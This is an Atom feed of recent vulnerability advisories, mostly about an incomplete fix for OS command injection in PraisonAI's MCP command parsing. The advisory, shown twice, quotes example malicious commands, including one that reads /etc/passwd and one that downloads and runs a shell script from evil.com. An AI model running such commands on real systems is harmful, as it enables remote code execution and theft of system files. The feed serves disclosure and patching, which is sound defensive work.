<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-06T06:00:19.701718+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-309171</id>
    <title>EUVD-2026-309171</title>
    <updated>2026-10-06T06:00:19.704367+00:00</updated>
    <content>EUVD-2026-309171</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-309171"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-41497</id>
    <title>fkie_cve-2026-41497</title>
    <updated>2026-10-06T06:00:19.704401+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>PraisonAI is a multi-agent teams system. Prior to version 4.6.9, the fix for PraisonAI's MCP command handling does not add a command allowlist or argument validation to parse_mcp_command(), allowing arbitrary executables like bash, python, or /bin/sh with inline code execution flags to pass through to subprocess execution. This issue has been patched in version 4.6.9.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-41497"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-9qhq-v63v-fv3j</id>
    <title>GHSA-9qhq-v63v-fv3j — PraisonAI has an incomplete fix for CVE-2026-34935 - OS Command Injection</title>
    <updated>2026-10-06T06:00:19.704434+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: praisonai</p>
<p>### Summary</p>
<p>The fix for PraisonAI's MCP command handling does not add a command allowlist or argument validation to `parse_mcp_command()`, allowing arbitrary executables like `bash`, `python`, or `/bin/sh` with inline code execution flags to pass through to subprocess execution.</p>
<p>### Affected Package</p>
<p>- **Ecosystem:** PyPI
- **Package:** MervinPraison/PraisonAI
- **Affected versions:** &lt; 47bff65413be
- **Patched versions:** &gt;= 47bff65413be</p>
<p>### Details</p>
<p>The vulnerability exists in `src/praisonai/praisonai/cli/features/mcp.py` in the `MCPHandler.parse_mcp_command()` method. This function parses MCP server command strings into executable commands, arguments, and environment variables. The pre-patch version performs no validation on the executable or arguments.</p>
<p>The fix commit `47bff654` was intended to address command injection, but the patched `parse_mcp_command()` still lacks three critical controls: there is no `ALLOWED_COMMANDS` allowlist of permitted executables (e.g., `npx`, `uvx`, `node`, `python`), there is no `os.path.basename()` validation to prevent path-based executable injection, and there is no argument inspection to block shell metacharacters or dangerous subcommands.</p>
<p>Malicious MCP server commands such as `python -c 'import os; os.system("id")'`, `bash -c 'cat /etc/passwd'`, and `/bin/sh -c 'wget http://evil.com/shell.sh | sh'` are all accepted by `parse_mcp_command()` and passed directly to subprocess execution without filtering.</p>
<p>### PoC</p>
<p>```python
#!/usr/bi…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-9qhq-v63v-fv3j"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-473</id>
    <title>PYSEC-2026-473 — PraisonAI has an incomplete fix for CVE-2026-34935 - OS Command Injection</title>
    <updated>2026-10-06T06:00:19.704494+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: praisonai</p>
<p>### Summary</p>
<p>The fix for PraisonAI's MCP command handling does not add a command allowlist or argument validation to `parse_mcp_command()`, allowing arbitrary executables like `bash`, `python`, or `/bin/sh` with inline code execution flags to pass through to subprocess execution.</p>
<p>### Affected Package</p>
<p>- **Ecosystem:** PyPI
- **Package:** MervinPraison/PraisonAI
- **Affected versions:** &lt; 47bff65413be
 - **Patched versions:** &gt;= 47bff65413be</p>
<p>### Details</p>
<p>The vulnerability exists in `src/praisonai/praisonai/cli/features/mcp.py` in the `MCPHandler.parse_mcp_command()` method. This function parses MCP server command strings into executable commands, arguments, and environment variables. The pre-patch version performs no validation on the executable or arguments.</p>
<p>The fix commit `47bff654` was intended to address command injection, but the patched `parse_mcp_command()` still lacks three critical controls: there is no `ALLOWED_COMMANDS` allowlist of permitted executables (e.g., `npx`, `uvx`, `node`, `python`), there is no `os.path.basename()` validation to prevent path-based executable injection, and there is no argument inspection to block shell metacharacters or dangerous subcommands.</p>
<p>Malicious MCP server commands such as `python -c 'import os; os.system("id")'`, `bash -c 'cat /etc/passwd'`, and `/bin/sh -c 'wget http://evil.com/shell.sh | sh'` are all accepted by `parse_mcp_command()` and passed directly to subprocess execution without filtering.</p>
<p>### PoC</p>
<p>```python
 #!/usr/…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-473"/>
  </entry>
</feed>
